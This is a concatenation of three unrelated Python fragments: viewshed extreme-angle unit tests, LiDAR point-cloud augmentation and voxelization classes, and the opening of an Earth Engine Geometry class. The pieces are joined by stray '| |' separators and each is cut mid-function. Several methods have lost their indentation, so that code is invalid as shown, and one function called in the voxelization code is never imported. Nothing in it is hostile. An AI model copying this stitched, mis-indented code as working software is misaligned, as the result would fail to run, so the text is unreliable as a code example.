        viewpoint = (array_shape[0]/2, array_shape[1]/2)
        # Shorthand constants
        pi = math.pi
        rad_to_deg = 180.0 / pi
        deg_to_rad = 1.0 / rad_to_deg
        # The angles we're expecting; keys are the (rounded) angle in degrees.
        a = {}
        a[18] = (np.arctan2(0.5, 1.5) * rad_to_deg + 360.) % 360.
        a[45] = 45.0
        a[71] = (np.arctan2(1.5, 0.5) * rad_to_deg + 360.) % 360.
        a[90] = 90.
        a[108] = (np.arctan2(1.5, -0.5) * rad_to_deg + 360.) % 360.
        a[135] = 135.0
        a[161] = (np.arctan2(0.5, -1.5) * rad_to_deg + 360.) % 360.
        a[180] = 180.
        a[198] = (np.arctan2(-0.5, -1.5) * rad_to_deg + 360.) % 360.
        a[225] = 225.0
        a[251] = (np.arctan2(-1.5, -0.5) * rad_to_deg + 360.) % 360.
        a[270] = 270.
        a[288] = (np.arctan2(-1.5, 0.5) * rad_to_deg + 360.) % 360.
        a[315] = 315.0
        a[341] = (np.arctan2(-0.5, 1.5) * rad_to_deg + 360.) % 360.
        # Convert to rad so it's compatible with extreme_cell_angles_naive
        for key in a.keys():
            a[key] *= deg_to_rad
        # Use the angles above to create the expected min/max angles
        # 1st line is for pixel at row 0, col 0
        # Subsequent lines are:
        # row 0, col 1,
        # row 0, col 2,
        # row 1, col 0,
        # row 1, col 2, (skip center point at row 1, col 1)
        # row 2, col 0,
        # row 2, col 1,
        # row 2, col 2,
        expected_extreme_angles = [ \
            (a[108], (a[135], a[161])), \
            (a[45], (a[90], a[135])), \
            (a[18], (a[45], a[71])), \
            (a[135], (a[180], a[225])), \
            (a[315], (0., a[45])), \
            (a[198], (a[225], a[251])), \
            (a[225], (a[270], a[315])), \
            (a[288], (a[315], a[341]))]
        # Compute extreme angles for each cell
        computed_extreme_angles = []
        for row in range(array_shape[0]):
            for col in range(array_shape[1]):
                # Skip the viewpoint itself at the grid center.
                if row == 1 and col == 1:
                    continue
                cell = (row, col)
                computed_extreme_angles.append( \
                    self.extreme_cell_angles_naive(cell, viewpoint))
        # convert tuple to np.array: unzip the nested (min, (center, max))
        # tuples into three parallel arrays.
        a, b = zip(*computed_extreme_angles)
        b, c = zip(*b)
        a = np.array(a)
        b = np.array(b)
        c = np.array(c)
        computed_extreme_angles = np.array([a, b, c])
        a, b = zip(*expected_extreme_angles)
        b, c = zip(*b)
        a = np.array(a)
        b = np.array(b)
        c = np.array(c)
        expected_extreme_angles = np.array([a, b, c])
        # Compare both results: total absolute deviation over all angles.
        error = np.sum(np.absolute(computed_extreme_angles - \
            expected_extreme_angles))
        # Assert if necessary
        message = 'error is ' + str(error)
        assert abs(error) < 1e-14, message
def extreme_cell_angles_naive(self, cell_coord, viewpoint_coord):
"""Test each of the 4 corners of a cell, compute their angle from
the viewpoint and return the smallest and largest angles in a tuple.
Inputs:
-cell_coord: (row, col) tuple of the cell we want to compute
the extreme angles from.
-viewpoint_coord: (row, col) tuple of the observer that is
looking at the point cell_coord.
Returns a numpy array with the extreme angles
[min_cell_angle, center_cell_angle, max_cell_angle]"""
# Convert cell and viewpoint tuples to numpy arrays
cell = np.array([cell_coord[0], cell_coord[1]])
viewpoint = np.array([viewpoint_coord[0], viewpoint_coord[1]])
# Compute the angle to the center of the cell
viewpoint_to_cell = cell - viewpoint
center_angle = np.arctan2(-viewpoint_to_cell[0], viewpoint_to_cell[1])
center_angle = (2.0 * math.pi + center_angle) % (2.0 * math.pi)
# Compute the minimum and maximum angles by goign through each corner
max_angle = 0.
min_angle = 2.0 * math.pi
# Define the 4 cell corners
corners = np.array([ \
[cell_coord[0] + .5, cell_coord[1] + .5], \
[cell_coord[0] - .5, cell_coord[1] + .5], \
[cell_coord[0] + .5, cell_coord[1] - .5], \
[cell_coord[0] - .5, cell_coord[1] - .5]])
# If cell angle is 0, use pre-computed corners for min and max:
if center_angle == 0.:
viewpoint_to_corner = corners[2] - viewpoint
min_angle = \
np.arctan2(-viewpoint_to_corner[0], viewpoint_to_corner[1])
min_angle = (2.0 * math.pi + min_angle) % (2.0 * math.pi)
viewpoint_to_corner = corners[3] - viewpoint
max_angle = \
np.arctan2(-viewpoint_to_corner[0], viewpoint_to_corner[1])
max_angle = (2.0 * math.pi + max_angle) % (2.0 * math.pi)
else:
# Compute angle to all 4 cell corners and update min and max angles
for corner in corners:
viewpoint_to_corner = corner - viewpoint
angle_to_corner = \
np.arctan2(-viewpoint_to_corner[0], viewpoint_to_corner[1])
angle_to_corner = \
(2.0 * math.pi + angle_to_corner) % (2.0 * math.pi)
# Sort the angles
if angle_to_corner > max_angle:
max_angle = angle_to_corner
if angle_to_corner < min_angle:
min_angle = angle_to_corner
# Done, return min and max angles
return (min_angle, (center_angle, max_angle))
    def test_maximum_distance(self):
        """Test that the maximum distance is properly computed in
        Python's list_extreme_angles"""
        def disk(radius):
            """Create a disk of radius 'radius' around a center pixel"""
            diameter = radius * 2 + 1
            A = np.zeros((diameter, diameter))
            center_r = radius
            center_c = center_r
            for r in range(diameter):
                for c in range(diameter):
                    # NOTE(review): this center check is a no-op (pass then
                    # falls through) -- the center is zeroed later instead.
                    if (r == center_r) and (c == center_c):
                        pass
                    # Squared distance from the center pixel.
                    d = (r-center_r)**2+(c-center_c)**2
                    if d <= center_r**2:
                        A[r, c] = 1
            return A
        # Test for discs of radius 1 to 5
        for max_dist in range(1, 6):
            array_shape = (max_dist * 2 + 1, max_dist * 2 + 1)
            viewpoint = (max_dist, max_dist)
            # Generate disc from nested function
            D = disk(max_dist)
            # Double check that what we have is within the radius
            I, J = np.where(D > 0)
            I = I - viewpoint[0]
            J = J - viewpoint[1]
            L = I**2 + J**2
            assert (L <= max_dist**2).all()
            I, J = np.where(D <= 0)
            I = I - viewpoint[0]
            J = J - viewpoint[1]
            L = I**2 + J**2
            assert (L > max_dist**2).all()
            # Adjusting the center to conform with list_extreme_angles
            D[viewpoint] = 0
            # Gather extreme angles from efficient algorithm
            extreme_angles = \
                sqc.list_extreme_cell_angles(array_shape, \
                viewpoint, max_dist)
            # Mark the cells the fast algorithm visited (row/col indices
            # are the 4th/5th entries of the returned tuple).
            A = np.zeros(array_shape)
            A[extreme_angles[3], extreme_angles[4]] = 1
            # compare both
            if np.sum(np.abs(A-D)) > 0:
                print('expected:')
                print(D)
                print('computed:')
                print(A)
            message = "Area of extreme angles doesn't form a valid disc."
            assert np.sum(np.abs(A-D)) == 0, message
    def test_extreme_cell_angles(self):
        """Testing naive vs optimized version of extreme cell angles"""
        max_dist = 4
        array_shape = (max_dist*2+1, max_dist*2+1)
        # NOTE: integer division (Python 2) -- viewpoint is the grid center.
        viewpoint = (array_shape[0]/2, array_shape[1]/2)
        max_dist_sq = max_dist **2 # Used to skip cells that are too far
        # Gather extreme angles from naive algorithm
        extreme_angles_naive = []
        for row in range(array_shape[0]):
            for col in range(array_shape[1]):
                cell = np.array([row, col])
                viewpoint_to_cell = cell - viewpoint
                # Outside the max-distance disc: skip.
                if np.sum(viewpoint_to_cell**2) > max_dist_sq:
                    continue
                # Skip the viewpoint cell itself.
                if (row == viewpoint[0]) and (col == viewpoint[1]):
                    continue
                cell = (row, col)
                extreme_angles_naive.append( \
                    self.extreme_cell_angles_naive(cell, viewpoint))
        # Convert to numpy: unzip (min, (center, max)) into three arrays.
        min_angles, nested_list = zip(*extreme_angles_naive)
        min_angles = np.array(min_angles)
        center_angles, max_angles = zip(*nested_list)
        center_angles = np.array(center_angles)
        max_angles = np.array(max_angles)
        extreme_angles_naive = (min_angles, center_angles, max_angles)
        # Gather extreme angles from efficient algorithm
        extreme_angles_fast = \
            sqc.list_extreme_cell_angles(array_shape, \
            viewpoint, max_dist)
        _min = extreme_angles_fast[0]
        _ctr = extreme_angles_fast[1]
        _max = extreme_angles_fast[2]
        I = extreme_angles_fast[3]
        J = extreme_angles_fast[4]
        matrix = np.zeros([np.max(I)+1, np.max(J)+1])
        np.set_printoptions(precision = 4)
        matrix[(I, J)] = _max
        #print('max')
        #print(matrix)
        #matrix[(I, J)] = _ctr
        #print('center')
        #print(matrix)
        #matrix[(I, J)] = _min
        #print('min')
        #print(matrix)
        # Compare the two: sum of absolute deviations over min/center/max.
        error = np.sum(np.abs(extreme_angles_naive[0]-extreme_angles_fast[0])+\
            np.abs(extreme_angles_naive[1]-extreme_angles_fast[1]) + \
            np.abs(extreme_angles_naive[2]-extreme_angles_fast[2]))
        # assert if necessary; dump both results first for debugging.
        if error > 5e-15:
            print('naive', extreme_angles_naive)
            print('fast', extreme_angles_fast)
            print('difference')
            print(extreme_angles_fast[0] - extreme_angles_naive[0])
            print(extreme_angles_fast[1] - extreme_angles_naive[1])
            print(extreme_angles_fast[2] - extreme_angles_naive[2])
        message = 'error on expected and computed angles is too large:' + \
            str(error)
        assert error < 5e-15, message
def test_list_extreme_cell_angles_cython(self):
"""Comparing cython vs python list_extreme_cell_angles"""
array_size = 6
array_shape = (array_size, array_size)
viewpoint = (array_shape[0]/4, array_shape[1]/3)
# Test with infinite distance
max_dist = -1
# Gather extreme angles from cython algorithm
extreme_angles_cython = \
scenic_quality_cython_core.list_extreme_cell_angles(array_shape, \
viewpoint, max_dist)
# Gather extreme angles from python algorithm
extreme_angles_python = \
sqc.list_extreme_cell_angles(array_shape, \
viewpoint, max_dist)
# Compare the two
error = np.sum(np.abs(extreme_angles_python[0]-extreme_angles_cython[0])+\
np.abs(extreme_angles_python[1]-extreme_angles_cython[1]) + \
np.abs(extreme_angles_python[2]-extreme_angles_cython[2]))
# assert | |
import numpy as np
import copy
import os
from up.utils.general.registry_factory import AUGMENTATION_REGISTRY
from up.data.datasets.transforms import Augmentation
from up.extensions.python import iou3d_nms_utils
from up.tasks.det_3d.data.box_utils import boxes3d_kitti_fakelidar_to_lidar, enlarge_box3d, remove_points_in_boxes3d
from up.tasks.det_3d.data.box_utils import mask_boxes_outside_range_numpy
from up.tasks.det_3d.data.data_utils import rotate_points_along_z, limit_period, keep_arrays_by_name
from up.utils.general.petrel_helper import PetrelHelper
# cumm's tensorview is an optional (CUDA-stack) dependency; fall back to
# tv = None when it is unavailable so CPU-only setups can still import.
tv = None
try:
    import cumm.tensorview as tv
except BaseException:
    pass
@AUGMENTATION_REGISTRY.register('point_sampling')
class PointAugSampling(Augmentation):
    """Ground-truth database sampling ("gt-aug") for 3D detection.

    Samples object point clouds from a pre-built GT database and pastes
    them into the current scene, rejecting samples whose boxes overlap
    (in BEV) with existing or already-sampled boxes.
    """
    def __init__(self, root_path, class_names, db_info_paths, db_info_filters, sample_groups,
                 num_point_features, remove_extra_width, limit_whole_scene=False, use_road_plane=True,
                 database_with_fakelidar=False, logger=None):
        # Directory that db_info 'path' entries are relative to.
        self.root_path = root_path
        self.class_names = class_names
        self.num_point_features = num_point_features
        # Margin used to enlarge sampled boxes when carving original scene
        # points out from under them.
        self.remove_extra_width = remove_extra_width
        # When True, per-class sample counts are quotas for the whole scene
        # (existing GT boxes count against them).
        self.limit_whole_scene = limit_whole_scene
        self.use_road_plane = use_road_plane
        # Set when the database stores boxes in the legacy "fakelidar"
        # convention and needs conversion to the lidar frame.
        self.database_with_fakelidar = database_with_fakelidar
        self.logger = logger
        self.db_infos = self.get_db_infos(db_info_paths, db_info_filters)
        self.sample_groups_dict, self.sample_class_num = self.get_sample_group(sample_groups)
    def augment(self, data):
        """Sample boxes per class, reject BEV overlaps, merge into *data*."""
        data_dict = copy.copy(data)
        gt_boxes = data_dict['gt_boxes']
        gt_names = data_dict['gt_names'].astype(str)
        existed_boxes = gt_boxes
        total_valid_sampled_dict = []
        for class_name, sample_group in self.sample_groups_dict.items():
            if self.limit_whole_scene:
                # Reduce the quota by the GTs of this class already present.
                num_gt = np.sum(class_name == gt_names)
                sample_group['sample_num'] = str(int(self.sample_class_num[class_name]) - num_gt)
            if int(sample_group['sample_num']) > 0:
                sampled_dict = self.sample_with_fixed_number(class_name, sample_group)
                sampled_boxes = np.stack([x['box3d_lidar'] for x in sampled_dict], axis=0).astype(np.float32)
                if self.database_with_fakelidar:
                    sampled_boxes = boxes3d_kitti_fakelidar_to_lidar(sampled_boxes)
                # BEV IoU of samples vs existing boxes (iou1) and vs each
                # other (iou2, diagonal zeroed); keep only overlap-free ones.
                iou1 = iou3d_nms_utils.boxes_bev_iou_cpu(sampled_boxes[:, 0:7], existed_boxes[:, 0:7])
                iou2 = iou3d_nms_utils.boxes_bev_iou_cpu(sampled_boxes[:, 0:7], sampled_boxes[:, 0:7])
                iou2[range(sampled_boxes.shape[0]), range(sampled_boxes.shape[0])] = 0
                iou1 = iou1 if iou1.shape[1] > 0 else iou2
                valid_mask = ((iou1.max(axis=1) + iou2.max(axis=1)) == 0).nonzero()[0]
                valid_sampled_dict = [sampled_dict[x] for x in valid_mask]
                valid_sampled_boxes = sampled_boxes[valid_mask]
                existed_boxes = np.concatenate((existed_boxes, valid_sampled_boxes), axis=0)
                total_valid_sampled_dict.extend(valid_sampled_dict)
        # Everything appended past the original GT boxes was sampled.
        sampled_gt_boxes = existed_boxes[gt_boxes.shape[0]:, :]
        if total_valid_sampled_dict.__len__() > 0:
            data_dict = self.add_sampled_boxes_to_scene(data_dict, sampled_gt_boxes, total_valid_sampled_dict)
        data_dict.pop('gt_boxes_mask')
        return data_dict
    def get_db_infos(self, db_info_paths, db_info_filters):
        """Load the GT-database info pickles and apply configured filters.

        *db_info_filters* maps a filter method name on this class (e.g.
        'filter_by_min_points') to its argument.
        """
        db_infos = {}
        for class_name in self.class_names:
            db_infos[class_name] = []
        for db_info_path in db_info_paths:
            infos = PetrelHelper.load_pk(db_info_path, mode='rb')
            [db_infos[cur_class].extend(infos[cur_class]) for cur_class in self.class_names]
        for func_name, val in db_info_filters.items():
            db_infos = getattr(self, func_name)(db_infos, val)
        return db_infos
    def get_sample_group(self, sample_groups):
        """Parse 'ClassName:count' strings into per-class sampling state.

        Each group keeps a shuffled index array and a pointer so samples
        are drawn without replacement until the database is exhausted.
        """
        sample_groups_dict = {}
        sample_class_num = {}
        for x in sample_groups:
            class_name, sample_num = x.split(':')
            if class_name not in self.class_names:
                continue
            sample_class_num[class_name] = sample_num
            sample_groups_dict[class_name] = {
                'sample_num': sample_num,
                'pointer': len(self.db_infos[class_name]),
                'indices': np.arange(len(self.db_infos[class_name]))
            }
        return sample_groups_dict, sample_class_num
    def filter_by_min_points(self, db_infos, min_gt_points_list):
        """Drop database objects with fewer points than 'Name:min' requires."""
        for name_num in min_gt_points_list:
            name, min_num = name_num.split(':')
            min_num = int(min_num)
            if min_num > 0 and name in db_infos.keys():
                filtered_infos = []
                for info in db_infos[name]:
                    if info['num_points_in_gt'] >= min_num:
                        filtered_infos.append(info)
                if self.logger is not None:
                    self.logger.info('Database filter by min points %s: %d => %d' %
                                     (name, len(db_infos[name]), len(filtered_infos)))
                db_infos[name] = filtered_infos
        return db_infos
    def filter_by_difficulty(self, db_infos, removed_difficulty):
        """Drop database objects whose difficulty is in *removed_difficulty*."""
        new_db_infos = {}
        for key, dinfos in db_infos.items():
            pre_len = len(dinfos)
            new_db_infos[key] = [
                info for info in dinfos
                if info['difficulty'] not in removed_difficulty
            ]
            if self.logger is not None:
                self.logger.info('Database filter by difficulty %s: %d => %d' % (key, pre_len, len(new_db_infos[key])))
        return new_db_infos
    def sample_with_fixed_number(self, class_name, sample_group):
        """
        Draw the next `sample_num` database entries for *class_name*,
        reshuffling once the pointer runs off the end of the database.
        Args:
            class_name: class to sample from.
            sample_group: dict with 'sample_num', 'pointer', 'indices'
                (mutated in place to advance the pointer).
        Returns:
            list of db_info dicts for the drawn samples.
        """
        sample_num, pointer, indices = int(sample_group['sample_num']), sample_group['pointer'], sample_group['indices']
        if pointer >= len(self.db_infos[class_name]):
            indices = np.random.permutation(len(self.db_infos[class_name]))
            pointer = 0
        sampled_dict = [self.db_infos[class_name][idx] for idx in indices[pointer: pointer + sample_num]]
        pointer += sample_num
        sample_group['pointer'] = pointer
        sample_group['indices'] = indices
        return sampled_dict
    @staticmethod
    def put_boxes_on_road_planes(gt_boxes, road_planes, calib):
        """
        Snap sampled boxes down onto the road plane.
        Only validate in KITTIDataset
        Args:
            gt_boxes: (N, 7 + C) [x, y, z, dx, dy, dz, heading, ...]
            road_planes: [a, b, c, d] plane coefficients in the rect frame
            calib: calibration with lidar_to_rect / rect_to_lidar
        Returns:
            (gt_boxes, mv_height): boxes with adjusted z, and the per-box
            height shift (also applied to the object points later).
        """
        a, b, c, d = road_planes
        center_cam = calib.lidar_to_rect(gt_boxes[:, 0:3])
        # Height of the plane at each box center (solve plane eq. for y).
        cur_height_cam = (-d - a * center_cam[:, 0] - c * center_cam[:, 2]) / b
        center_cam[:, 1] = cur_height_cam
        cur_lidar_height = calib.rect_to_lidar(center_cam)[:, 2]
        mv_height = gt_boxes[:, 2] - gt_boxes[:, 5] / 2 - cur_lidar_height
        gt_boxes[:, 2] -= mv_height  # lidar view
        return gt_boxes, mv_height
    def add_sampled_boxes_to_scene(self, data_dict, sampled_gt_boxes, total_valid_sampled_dict):
        """Load the sampled objects' points and merge boxes/points/names
        into the scene, removing original points under the new boxes."""
        gt_boxes_mask = data_dict['gt_boxes_mask']
        gt_boxes = data_dict['gt_boxes'][gt_boxes_mask]
        gt_names = data_dict['gt_names'][gt_boxes_mask]
        points = data_dict['points']
        if self.use_road_plane:
            sampled_gt_boxes, mv_height = self.put_boxes_on_road_planes(
                sampled_gt_boxes, data_dict['road_plane'], data_dict['calib']
            )
            data_dict.pop('calib')
            data_dict.pop('road_plane')
        obj_points_list = []
        for idx, info in enumerate(total_valid_sampled_dict):
            file_path = os.path.join(self.root_path, info['path'])
            f = PetrelHelper._petrel_helper.load_data(file_path, ceph_read=False, fs_read=True, mode='rb')
            obj_points = np.frombuffer(f, dtype=np.float32).reshape(
                [-1, self.num_point_features]).copy()
            # Object points are stored centered; translate to the box center.
            obj_points[:, :3] += info['box3d_lidar'][:3]
            if self.use_road_plane:
                # mv height
                obj_points[:, 2] -= mv_height[idx]
            obj_points_list.append(obj_points)
        obj_points = np.concatenate(obj_points_list, axis=0)
        sampled_gt_names = np.array([x['name'] for x in total_valid_sampled_dict])
        # Carve out original points under (slightly enlarged) sampled boxes
        # so pasted objects don't overlap leftover scene points.
        large_sampled_gt_boxes = enlarge_box3d(
            sampled_gt_boxes[:, 0:7], extra_width=self.remove_extra_width
        )
        points = remove_points_in_boxes3d(points, large_sampled_gt_boxes)
        points = np.concatenate([obj_points, points], axis=0)
        gt_names = np.concatenate([gt_names, sampled_gt_names], axis=0)
        gt_boxes = np.concatenate([gt_boxes, sampled_gt_boxes], axis=0)
        data_dict['gt_boxes'] = gt_boxes
        data_dict['gt_names'] = gt_names
        data_dict['points'] = points
        return data_dict
@AUGMENTATION_REGISTRY.register('point_flip')
class PointFlip(Augmentation):
    """Randomly mirror the scene (boxes and point cloud) about the x and/or
    y axis; each configured axis is flipped independently with p=0.5."""
    def __init__(self, along_axis_list):
        # Axes ('x'/'y') that may be flipped, each with probability 0.5.
        self.along_axis_list = along_axis_list
    def augment(self, data):
        """Return a shallow copy of *data* with boxes/points possibly flipped."""
        output = copy.copy(data)
        boxes, cloud = output['gt_boxes'], output['points']
        for axis in self.along_axis_list:
            assert axis in ['x', 'y']
            flip = getattr(self, 'random_flip_along_%s' % axis)
            boxes, cloud = flip(boxes, cloud)
        output['gt_boxes'] = boxes
        output['points'] = cloud
        return output
    def random_flip_along_x(self, gt_boxes, points):
        """Mirror about the x axis (negate y and heading) with probability 0.5.

        Args:
            gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
            points: (M, 3 + C)
        """
        enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
        if enable:
            gt_boxes[:, 1] = -gt_boxes[:, 1]
            gt_boxes[:, 6] = -gt_boxes[:, 6]
            points[:, 1] = -points[:, 1]
            if gt_boxes.shape[1] > 7:
                # Mirror the y velocity component as well.
                gt_boxes[:, 8] = -gt_boxes[:, 8]
        return gt_boxes, points
    def random_flip_along_y(self, gt_boxes, points):
        """Mirror about the y axis (negate x, reflect heading) with p=0.5.

        Args:
            gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
            points: (M, 3 + C)
        """
        enable = np.random.choice([False, True], replace=False, p=[0.5, 0.5])
        if enable:
            gt_boxes[:, 0] = -gt_boxes[:, 0]
            gt_boxes[:, 6] = -(gt_boxes[:, 6] + np.pi)
            points[:, 0] = -points[:, 0]
            if gt_boxes.shape[1] > 7:
                # Mirror the x velocity component as well.
                gt_boxes[:, 7] = -gt_boxes[:, 7]
        return gt_boxes, points
@AUGMENTATION_REGISTRY.register('point_rotation')
class PointRotation(Augmentation):
    """Rotate the whole scene around the z axis by one random angle."""

    def __init__(self, rot_range):
        self.rot_range = rot_range

    def augment(self, data):
        return self.random_world_rotation(copy.copy(data))

    def random_world_rotation(self, data_dict):
        # A scalar range r is interpreted as the symmetric interval [-r, r].
        if not isinstance(self.rot_range, list):
            self.rot_range = [-self.rot_range, self.rot_range]
        boxes, pts = self.global_rotation(
            data_dict['gt_boxes'], data_dict['points'], rot_range=self.rot_range
        )
        data_dict['gt_boxes'] = boxes
        data_dict['points'] = pts
        return data_dict

    def global_rotation(self, gt_boxes, points, rot_range):
        """Rotate points and boxes around z by an angle drawn from rot_range.

        Args:
            gt_boxes: (N, 7 + C), [x, y, z, dx, dy, dz, heading, [vx], [vy]]
            points: (M, 3 + C)
            rot_range: [min, max]
        Returns:
            (gt_boxes, points) rotated by the same angle.
        """
        angle = np.random.uniform(rot_range[0], rot_range[1])
        rot = np.array([angle])
        points = rotate_points_along_z(points[np.newaxis, :, :], rot)[0]
        gt_boxes[:, 0:3] = rotate_points_along_z(gt_boxes[np.newaxis, :, 0:3], rot)[0]
        gt_boxes[:, 6] += angle
        if gt_boxes.shape[1] > 7:
            # Rotate the (vx, vy) velocity vector too; pad z=0 for the helper.
            vel = np.hstack((gt_boxes[:, 7:9], np.zeros((gt_boxes.shape[0], 1))))
            gt_boxes[:, 7:9] = rotate_points_along_z(vel[np.newaxis, :, :], rot)[0][:, 0:2]
        return gt_boxes, points
@AUGMENTATION_REGISTRY.register('point_scaling')
class PointScaling(Augmentation):
    """Uniformly scale the whole scene by one random factor."""

    def __init__(self, scale_range):
        self.scale_range = scale_range

    def augment(self, data):
        return self.random_world_scaling(copy.copy(data))

    def random_world_scaling(self, data_dict):
        boxes, pts = self.global_scaling(
            data_dict['gt_boxes'], data_dict['points'], self.scale_range
        )
        data_dict['gt_boxes'] = boxes
        data_dict['points'] = pts
        return data_dict

    def global_scaling(self, gt_boxes, points, scale_range):
        """Scale point xyz and box xyz+dims by one random factor.

        Args:
            gt_boxes: (N, 7), [x, y, z, dx, dy, dz, heading]
            points: (M, 3 + C)
            scale_range: [min, max]
        Returns:
            (gt_boxes, points) scaled in place.
        """
        # Degenerate range: treat as "no scaling" and skip the RNG draw.
        if scale_range[1] - scale_range[0] < 1e-3:
            return gt_boxes, points
        factor = np.random.uniform(scale_range[0], scale_range[1])
        points[:, :3] *= factor
        gt_boxes[:, :6] *= factor
        return gt_boxes, points
@AUGMENTATION_REGISTRY.register('point_to_voxel')
class PointProcessor(Augmentation):
def __init__(self, point_cloud_range, num_point_features, voxel_size, max_points_per_voxel, max_number_of_voxels,
             remove_outside_boxes=True, shuffle_enabled=False):
    """Configure point-to-voxel conversion.

    grid_size is derived from the cloud range divided by the voxel size,
    rounded to whole voxels per axis.
    """
    self.point_cloud_range = point_cloud_range
    self.num_point_features = num_point_features
    self.voxel_size = voxel_size
    self.max_number_of_voxels = max_number_of_voxels
    self.max_points_per_voxel = max_points_per_voxel
    self.remove_outside_boxes = remove_outside_boxes
    self.shuffle_enabled = shuffle_enabled
    extent = (np.array(self.point_cloud_range[3:6])
              - np.array(self.point_cloud_range[0:3]))
    self.grid_size = np.round(extent / np.array(self.voxel_size)).astype(np.int64)
def augment(self, data):
    """Convert the scene's points into voxels (with box/point filtering).

    Args:
        data_dict:
            points: (N, 3 + C_in)
            gt_boxes: optional, (N, 7 + C) [x, y, z, dx, dy, dz, heading, ...]
            gt_names: optional, (N), string
            ...
    Returns:
        data_dict extended with 'voxels', 'voxel_coords',
        'voxel_num_points' and 'voxel_infos'.
    """
    data_dict = copy.copy(data)
    self.training = data_dict['training']
    self.class_names = data_dict['class_names']
    points = data_dict.get('points', None)
    # NOTE(review): reads 'gt_bboxes' while the rest of this class uses
    # 'gt_boxes' — looks like a typo, but the masked boxes below are never
    # written back into data_dict, so "fixing" it would change behavior;
    # confirm intent before touching.
    gt_boxes = data_dict.get('gt_bboxes', None)
    data_dict = self.before_to_voxel(data_dict)
    points = self.points_encoding(points)
    # Only the filtered points are kept; the filtered gt_boxes is discarded.
    points, gt_boxes = self.mask_points_and_boxes_outside_range(points, gt_boxes)
    voxels, coordinates, num_points = self.transform_points_to_voxels(points)
    voxel_infos = {'grid_size': self.grid_size, 'num_point_features': self.num_point_features,
                   'voxel_size': self.voxel_size, 'point_cloud_range': self.point_cloud_range}
    data_dict.update({'points': points, 'voxels': voxels, 'voxel_coords': coordinates,
                      'voxel_num_points': num_points, 'voxel_infos': voxel_infos})
    return data_dict
def before_to_voxel(self, data_dict):
    """Normalize GT annotations before voxelization.

    Steps: wrap headings into a single period (training only), drop
    calib/road_plane leftovers, apply 'gt_boxes_mask', keep only boxes of
    the configured classes, and append the 1-based class index as the
    last box column.
    """
    if self.training:
        # Wrap heading angles into [-pi, pi).
        data_dict['gt_boxes'][:, 6] = limit_period(
            data_dict['gt_boxes'][:, 6], offset=0.5, period=2 * np.pi
        )
    if 'calib' in data_dict:
        data_dict.pop('calib')
    if 'road_plane' in data_dict:
        data_dict.pop('road_plane')
    if 'gt_boxes_mask' in data_dict:
        gt_boxes_mask = data_dict['gt_boxes_mask']
        data_dict['gt_boxes'] = data_dict['gt_boxes'][gt_boxes_mask]
        data_dict['gt_names'] = data_dict['gt_names'][gt_boxes_mask]
        if 'gt_boxes2d' in data_dict:
            data_dict['gt_boxes2d'] = data_dict['gt_boxes2d'][gt_boxes_mask]
        data_dict.pop('gt_boxes_mask')
    if data_dict.get('gt_boxes', None) is not None:
        # Keep only annotations whose class is in self.class_names.
        selected = keep_arrays_by_name(data_dict['gt_names'], self.class_names)
        data_dict['gt_boxes'] = data_dict['gt_boxes'][selected]
        data_dict['gt_names'] = data_dict['gt_names'][selected]
        # Class labels are 1-based (0 is reserved for background).
        gt_classes = np.array([self.class_names.index(n) + 1 for n in data_dict['gt_names']], dtype=np.int32)
        gt_boxes = np.concatenate((data_dict['gt_boxes'], gt_classes.reshape(-1, 1).astype(np.float32)), axis=1)
        data_dict['gt_boxes'] = gt_boxes
        if data_dict.get('gt_boxes2d', None) is not None:
            data_dict['gt_boxes2d'] = data_dict['gt_boxes2d'][selected]
    return data_dict
def mask_points_and_boxes_outside_range(self, points, gt_boxes):
    """Drop points (and, when training, boxes) outside point_cloud_range."""
    if points is not None:
        keep_pts = mask_points_by_range(points, self.point_cloud_range)
        points = points[keep_pts]
    if gt_boxes is not None and self.remove_outside_boxes and self.training:
        keep_boxes = mask_boxes_outside_range_numpy(gt_boxes, self.point_cloud_range)
        gt_boxes = gt_boxes[keep_boxes]
    return points, gt_boxes
def transform_points_to_voxels(self, points):
if self.shuffle_enabled:
shuffle_idx = np.random.permutation(points.shape[0])
| |
#!/usr/bin/env python
"""An object representing EE Geometries."""
# Using lowercase function naming to match the JavaScript names.
# pylint: disable=g-bad-name
import collections
import json
import numbers
import apifunction
import computedobject
import ee_exception
import ee_types
import serializer
# A sentinel value used to detect unspecified function parameters.
_UNSPECIFIED = object()
class Geometry(computedobject.ComputedObject):
"""An Earth Engine geometry."""
_initialized = False
def __init__(self, geo_json, opt_proj=None, opt_geodesic=None,
             opt_evenOdd=None):
  """Creates a geometry.

  Args:
    geo_json: The GeoJSON object describing the geometry or a
        computed object to be reinterpreted as a Geometry. Supports
        CRS specifications as per the GeoJSON spec, but only allows named
        (rather than "linked" CRSs). If this includes a 'geodesic' field,
        and opt_geodesic is not specified, it will be used as opt_geodesic.
    opt_proj: An optional projection specification, either as an
        ee.Projection, as a CRS ID code or as a WKT string. If specified,
        overrides any CRS found in the geo_json parameter. If unspecified and
        the geo_json does not declare a CRS, defaults to "EPSG:4326"
        (x=longitude, y=latitude).
    opt_geodesic: Whether line segments should be interpreted as spherical
        geodesics. If false, indicates that line segments should be
        interpreted as planar lines in the specified CRS. If absent,
        defaults to true if the CRS is geographic (including the default
        EPSG:4326), or to false if the CRS is projected.
    opt_evenOdd: If true, polygon interiors will be determined by the even/odd
        rule, where a point is inside if it crosses an odd number of edges to
        reach a point at infinity. Otherwise polygons use the left-inside
        rule, where interiors are on the left side of the shell's edges when
        walking the vertices in the given order. If unspecified, defaults to
        True.

  Raises:
    EEException: if the given geometry isn't valid.
  """
  self.initialize()
  # A ComputedObject is wrapped verbatim unless it is already a concrete
  # (typed) Geometry literal.
  computed = (isinstance(geo_json, computedobject.ComputedObject) and
              not (isinstance(geo_json, Geometry) and
                   geo_json._type is not None))  # pylint: disable=protected-access
  options = opt_proj or opt_geodesic or opt_evenOdd
  if computed:
    if options:
      # Fixed typo in the user-facing message ('suported' -> 'supported').
      raise ee_exception.EEException(
          'Setting the CRS or geodesic on a computed Geometry is not '
          'supported. Use Geometry.transform().')
    else:
      super(Geometry, self).__init__(
          geo_json.func, geo_json.args, geo_json.varName)
      return
  # Below here we're working with a GeoJSON literal.
  if isinstance(geo_json, Geometry):
    geo_json = geo_json.encode()
  if not Geometry._isValidGeometry(geo_json):
    raise ee_exception.EEException('Invalid GeoJSON geometry.')
  super(Geometry, self).__init__(None, None)
  # The type of the geometry.
  self._type = geo_json['type']
